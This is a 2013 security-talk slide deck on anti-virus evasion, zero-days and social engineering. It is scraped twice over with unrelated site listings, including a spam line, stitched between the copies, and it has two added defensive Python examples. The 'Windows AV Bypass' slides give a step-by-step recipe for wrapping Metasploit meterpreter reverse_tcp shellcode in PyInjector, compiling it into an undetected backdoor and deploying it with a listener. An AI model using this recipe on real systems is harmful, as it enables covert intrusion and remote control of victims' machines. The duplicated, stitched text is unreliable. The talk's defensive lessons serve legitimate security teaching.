Security Weekly™ Presents: Give Me Three Things
Sometimes, three is bad
http://securityweekly.com
Brought To You By: consulting@blackhillsinfosec.com
The Need for Focus
• It is easy to get caught up in the latest "hack of the day"
• Let's talk about iPhone attacks, Android malware, backdoors from chargers, DLP, hacking ATMs, breaking into drones, hacking obscure software X
• But when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013
#1 Crappy Malware
• Had enough presentations on the "not so advanced persistent threat"?
• Somehow, the belief is that if we can make fun of the attackers' skill level it makes us... better? Smarter?
• Why? Because...
Results Matter
About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337, or even 31337: just right
Poison Ivy
Citadel
AV Bypass Made Easy
• Many of these tools have options to export the payload as a raw string of hex characters
• In fact, that does not even matter
• We can use Ghost Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies: why I pentest
Ghost Writing: Creating the Binary
Converting to Assembly
Editing the Assembly
Finalize the Payload
Python Injection
• Another technique is to:
• Convert your payload into raw output
• Import the raw output into a Python script
• Convert the Python script into an executable
• It works because the text sections of an .exe are not being reviewed by many AV vendors
• They would have to write a signature for Python itself
• Not likely
• Great write-up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass
Windows AV Bypass - Setup
• Create a Windows box with the prerequisites
• Same architecture as the target (32-bit vs. 64-bit)
• Install Python: http://www.python.org/
• Add Python to the system PATH
• Install PyWin32: http://sourceforge.net/projects/pywin32/
• Install PyInstaller: http://www.pyinstaller.org/
• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip
Windows AV Bypass - Config
• Extract the files from PyInjector
• Move pyinjector.py into the root of the PyInstaller folder
• Use msfpayload to generate the shellcode as a C-style escaped string (on any machine):
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Replace LHOST with the address your listener will actually be on
• Keep only the \x.. portion of the output: drop the leading unsigned char buf[] = and the trailing ;
• Make sure the payload matches the target architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>'
• where <msfpayload output> is the output of the msfpayload command above
Windows AV Bypass - Compile
• While in the PyInstaller directory:
• python utils/Makespec.py --onefile --noconsole pyinjector.py
• python utils/Build.py pyinjector/pyinjector.spec
• The new backdoor should be under:
• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don't forget your listener!!! (a multi/handler set to the same payload, LHOST and LPORT)
Or You Could Just Choose Option 15
#2 0-day du Jour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it until it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?
Lessons
• Blacklist AV is easy to bypass
• In fact, we had to do it with Poison Ivy last week
• Yeah, a piece of malware five years old
• The attackers will be exactly as advanced as they need to be
• Which is not very advanced
Focus and Future Plans
• Hacker Guard lesson: don't just focus on malware, focus on detecting an attacker's impact on a system
• Get away from blacklist security
• Now
• Right now
• ...I mean after this presentation
#3 Users Making "Mistakes"
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha ha!!! Users are "dumb"
• Yeah... right?
• Not so fast, sparky
We are all Dumb
• Or, the pretexts the attackers use are getting really, really good
• Some of the SE pretexts we use are not fair:
• A major insurance company and a change of coverage
• LinkedIn merit badges
• If the attack is tailored, it is successful
Caller ID Spoofing
Hail Pentest Geek!
http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/
Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good
Focus and Future Plans
• Hacker Guard lesson: once again, focus on attacker actions
• Limit the damage the user can do
• Implement firewalls
• Implement Software Restriction Policies
• Implement Internet whitelisting
• But don't simply believe the user is stupid
• Train them: Securing the Human
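A Software Restriction Policy path rule is only as good as the directories it trusts. The Python below is an added example, not part of the deck and not Windows' own SRP/AppLocker enforcement: it simulates a default-deny path rule set in the spirit of the slide's advice, using assumed allowed roots, and shows the caveat a practitioner wants before relying on it. A rule that trusts C:\Windows wholesale also trusts standard-user-writable folders beneath it (C:\Windows\Temp, C:\Windows\Tasks, C:\Windows\Tracing are well-known ones; treat the exact list as an assumption to verify against your own build), so the renamed backdoor from the slides earlier runs with the policy's blessing if it is dropped there. The hardened variant carves those pockets out, and both variants ignore the file name and the AV verdict entirely, which is the point of moving away from blacklists.

```python
import ntpath

# Default-deny policy in the spirit of an SRP/AppLocker path rule set:
# anything outside these roots is blocked, whatever it is called.
# Assumed roots for the example; adjust to the build you actually run.
ALLOWED_ROOTS = (
    r"C:\Windows",
    r"C:\Program Files",
    r"C:\Program Files (x86)",
)

# Standard-user-writable directories that live *under* an allowed root.
# Well-known examples; verify the list against your own image.
WRITABLE_UNDER_ROOTS = (
    r"C:\Windows\Temp",
    r"C:\Windows\Tasks",
    r"C:\Windows\Tracing",
)


def _norm(path: str) -> str:
    """Collapse '..', mixed separators and case so a rule cannot be slipped
    past with something like C:\\Program Files\\..\\Users\\bob\\evil.exe."""
    return ntpath.normcase(ntpath.normpath(path))


def _under(path: str, root: str) -> bool:
    """True if path is root itself or anything beneath it."""
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + "\\")


def naive_allows(path: str) -> bool:
    """Prefix-only rule: the way the first draft of a policy usually reads."""
    return any(_under(path, root) for root in ALLOWED_ROOTS)


def hardened_allows(path: str) -> bool:
    """Same roots, minus the writable pockets beneath them. Still default
    deny, and still indifferent to the file's name or any AV verdict."""
    if any(_under(path, w) for w in WRITABLE_UNDER_ROOTS):
        return False
    return naive_allows(path)


def evaluate(paths) -> dict:
    """Map each path to (naive verdict, hardened verdict)."""
    return {p: (naive_allows(p), hardened_allows(p)) for p in paths}


if __name__ == "__main__":
    # Constructed sample paths, including the renamed backdoor from the
    # PyInjector slides dropped in the usual places.
    samples = [
        r"C:\Windows\System32\notepad.exe",
        r"C:\Users\bob\Downloads\Invoice.exe",
        r"C:\Windows\Temp\Invoice.exe",
        r"C:\Program Files\..\Users\bob\Invoice.exe",
        r"c:/windows/tasks/Invoice.exe",
    ]
    for path, (naive, hardened) in evaluate(samples).items():
        print(f"{path:45} naive={naive!s:5} hardened={hardened!s:5}")
```

The fourth and fifth samples are the ones worth staring at: normalisation is what stops the `..` trick, and the writable-directory carve-out is what stops the Tasks drop. Neither check cares whether the binary is called pyinjector.exe or Invoice.exe.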
Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We lose sight of that in this industry
OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013
End of Line
• Hack Naked TV episodes: http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes: https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2

IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

Give Me Three Things: Anti-Virus Bypass Made Easy

1. Security Weekly™ Presents: Give Me Three Things. Sometimes, three is bad. http://securityweekly.com

2. Brought To You By: consulting@blackhillsinfosec.com

3. The Need for Focus
• It is easy to get caught up in the latest “Hack of the day”
• Let’s talk about
  • iPhone attacks, Android Malware, Backdoors from chargers, DLP, Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013

4. #1 Crappy Malware
• Had enough presentations on the “Not so advanced persistent threat?”
• Somehow, the belief is that if we can make fun of the attackers’ skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..

6. About that Malware
• It tends to be well known
• It tends to have AV signatures*
• Tracing it back to a specific group can be hard
• Anyone can download it
• It is not 1337 or even 31337. Just right

9. AV Bypass Made Easy
• Many of these tools have options to export to a raw string of hex characters
• In fact, that does not even matter
• We can use Ghost Writing techniques
• Simply exporting and re-importing as a script does the trick
• Flame did this with Lua
This and cookies: Why I pentest

10. Ghost Writing: Creating the Binary

11. Converting to Assembly

12. Editing the Assembly

13. Finalize the Payload

14. Python Injection
• Another technique is to:
  • Convert your payload into Raw output
  • Import the Raw output into a python script
  • Convert the Python script into an executable
• It all works because the text sections of an .exe are not being reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass

15. Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python: http://www.python.org/
• Add Python to system PATH
• Install PyWin32: http://sourceforge.net/projects/pywin32/
• Install PyInstaller: http://www.pyinstaller.org/
• Download PyInjector: https://www.trustedsec.com/files/pyinjector.zip

16. Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any machine)
  • msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d '\n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
  • replace: shellcode = sys.argv[1]
  • with: shellcode = '<msfpayload output>'
  • where: <msfpayload output> = output from the above msfpayload command

17. Windows AV Bypass - Compile
• While in the PyInstaller Directory:
  • python utils\Makespec.py --onefile --noconsole pyinjector.py
  • python utils\Build.py pyinjector/pyinjector.spec
• New backdoor should be under:
  • [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!
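The defender's side of the build procedure above, as an added example that is not from the deck: instead of a signature for the bundled script or payload string (the thing slide 14 says AV would need), it looks for the PyInstaller packer's own markers in a PE file, the CArchive cookie magic and the names PyInstaller writes into the bundle's table of contents. The sample bytes are constructed; the marker set is an assumption based on PyInstaller's archive format, and a hit is triage, not a verdict, because legitimate PyInstaller-built applications carry the same markers.

```python
"""Flag executables that carry a PyInstaller one-file bundle.

Added defensive example (not the deck's or PyInstaller's code). A
one-file build appends a CArchive to the PE; its trailing cookie begins
with the magic MEI\x0c\x0b\x0a\x0b\x0e, and the archive's table of
contents names the bundled PYZ ("PYZ-00.pyz") and the Python DLL. Those
markers do not depend on which script was bundled, so they let a
defender triage such binaries without a per-payload signature.
"""
import re

# CArchive cookie magic used by PyInstaller (assumed stable across versions).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Names commonly present in the bundle's table of contents.
SECONDARY_MARKERS = [
    re.compile(rb"PYZ-\d\d\.pyz"),
    re.compile(rb"python\d\d\.dll"),
]


def scan_pyinstaller(data: bytes) -> dict:
    """Return the indicators found in raw file bytes."""
    result = {"magic_offset": data.rfind(PYINSTALLER_MAGIC), "markers": []}
    for rx in SECONDARY_MARKERS:
        m = rx.search(data)
        if m:
            result["markers"].append(m.group(0).decode())
    # The cookie is the decisive marker; the names only add confidence.
    result["is_pyinstaller"] = result["magic_offset"] >= 0
    return result


def scan_file(path: str) -> dict:
    """Scan a file on disk (reads it whole; fine for typical EXE sizes)."""
    with open(path, "rb") as f:
        return scan_pyinstaller(f.read())


# Constructed samples: a fake MZ header, a TOC-like region and a cookie,
# versus a plain blob with neither. Not real executables.
SAMPLE_BUNDLE = (b"MZ" + b"\x00" * 62 + b"...PYZ-00.pyz\x00python27.dll\x00"
                 + b"\x00" * 16 + PYINSTALLER_MAGIC + b"\x00" * 16)
SAMPLE_PLAIN = b"MZ" + b"\x00" * 200

if __name__ == "__main__":
    for name, blob in (("bundle", SAMPLE_BUNDLE), ("plain", SAMPLE_PLAIN)):
        print(name, scan_pyinstaller(blob))
```

Pair a hit with what the deck's lesson slides recommend: treat it as a reason to look at the process's behaviour (network connections, injected threads) rather than as a blacklist entry.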
18. Or You Could Just Choose Option 15

19. #2 0-day du Jour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?

20. Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as they need to be
• Which is not very advanced

21. Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on malware, focus on detecting an attacker’s impact on a system
• Get away from Black List Security
• Now
• Right now
• .. I mean after this presentation

22. #3 Users Making “Mistakes”
• How could we have a presentation without this?
• There is no way hackers would be this successful without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky

23. We are all Dumb
• Or, the pretexts for the attackers are getting really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of coverage
• Linked-in merit badges
• If the attack is tailored, it is successful

24. Caller ID Spoofing

25. Hail Pentest Geek!
• http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/

26. Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good

27. Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on attacker actions
• Limit the damage the user can do
• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human

28. Conclusions
• While bright shiny objects are bright and shiny
• We need to come back to basics and fundamentals
• We lose sight of that in this industry

29. OCM at Black Hat
• Offensive Countermeasures at Black Hat 2013
• http://tinyurl.com/HNTV-BH-2013

30. End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
  • Blip.tv: http://blip.tv/securityweekly
  • YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
  • https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2

Editor's notes

  1. Intro slide, change your name